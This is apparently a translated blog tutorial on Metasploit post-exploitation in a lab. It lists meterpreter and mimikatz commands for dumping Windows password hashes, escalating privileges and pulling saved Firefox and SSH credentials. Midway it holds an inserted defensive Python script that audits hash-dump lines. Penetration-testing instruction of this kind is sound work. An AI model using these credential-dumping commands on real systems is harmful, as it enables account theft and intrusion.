Intranet Penetration: Intranet Information Collection (3)
2022-07-06 14:29:00 【Unknown white hat】
Catalog
Metasploit intranet information collection
Privilege escalation from an ordinary user
Metasploit intranet information collection
Attacker: Kali 192.168.0.103
Target: Win7 192.168.0.105
07 Password cracking
use post/windows/gather/hashdump // requires a meterpreter session with SYSTEM privileges
set session 1
exploit // the results are stored under the tmp directory
use post/windows/gather/smart_hashdump
set session 1
exploit
Format
username:RID:LM hash:NT hash
The RID is a fixed value that corresponds to a Windows system account, similar to the uid and gid numbers on Linux: 500 is Administrator, 501 is Guest, and so on. The LM hash and the NT hash are both hashes of the user's password, but they are computed with different methods.
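From the defender's side, the same four-field format can be audited for weak settings. The following is an added example, not code from the original post: the function names are hypothetical, the sample lines are constructed with placeholder hashes, and the trailing `:::` is assumed from the usual pwdump-style output.

```python
# Added example: audit lines in the "username:RID:LM hash:NT hash" format.
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty string (no LM hash stored)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest"}
HEX = set("0123456789abcdef")

# Constructed sample input: hash values are placeholders, not a real dump.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1000:22222222222222222222222222222222:11111111111111111111111111111111:::
not a valid line
"""

def parse_line(line):
    """Split one line into its four fields; return None if it is malformed."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        return None
    lm, nt = parts[2].lower(), parts[3].lower()
    if len(lm) != 32 or len(nt) != 32 or not set(lm + nt) <= HEX:
        return None
    return {"user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt}

def audit(text):
    """Return (user, finding) tuples: well-known RIDs and weak settings."""
    findings, by_nt = [], defaultdict(list)
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # skip banners and malformed lines
        if rec["rid"] in WELL_KNOWN_RIDS:
            findings.append((rec["user"], WELL_KNOWN_RIDS[rec["rid"]]))
        if rec["lm"] != EMPTY_LM:
            findings.append((rec["user"], "LM hash stored"))
        if rec["nt"] == EMPTY_NT:
            findings.append((rec["user"], "blank password"))
        by_nt[rec["nt"]].append(rec["user"])
    for users in by_nt.values():
        if len(users) > 1:  # identical NT hash means identical password
            findings.append((", ".join(users), "same password hash"))
    return findings

if __name__ == "__main__":
    for who, what in audit(SAMPLE):
        print(f"{who}: {what}")
```

Accounts flagged with "LM hash stored" point to a host where LM hash storage has not been disabled, and a shared NT hash shows password reuse between accounts.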
hashdump uses part of the functionality of mimikatz
load mimikatz
wdigest, kerberos, msv, ssp, tspkg, livessp
mimikatz_command -h
mimikatz_command -f a:: // query which modules are available
mimikatz_command -f samdump::hashes
mimikatz_command -f samdump::bootkey
Privilege escalation from an ordinary user
getuid // view the current user's permissions
hashdump // requires administrator privileges
getsystem // only appears to obtain administrator privileges; some real administrator privileges are still missing
ps // list the processes
getpid // view the current process
migrate // process migration (migrate from an ordinary user's process to an administrator user's process)
hashdump
08 Other
Determine whether the target host is a virtual machine:
run checkvm
Get the software installation information on the target host:
run post/windows/gather/enum_applications
Get the most recently accessed documents and link information on the target host:
run post/windows/gather/dumplinks
View the target environment information:
run post/windows/gather/env
View the accounts and passwords stored in Firefox:
run post/windows/gather/firefox_creds
View the encrypted SSH account passwords and certificate information:
run post/windows/gather/ssh_creds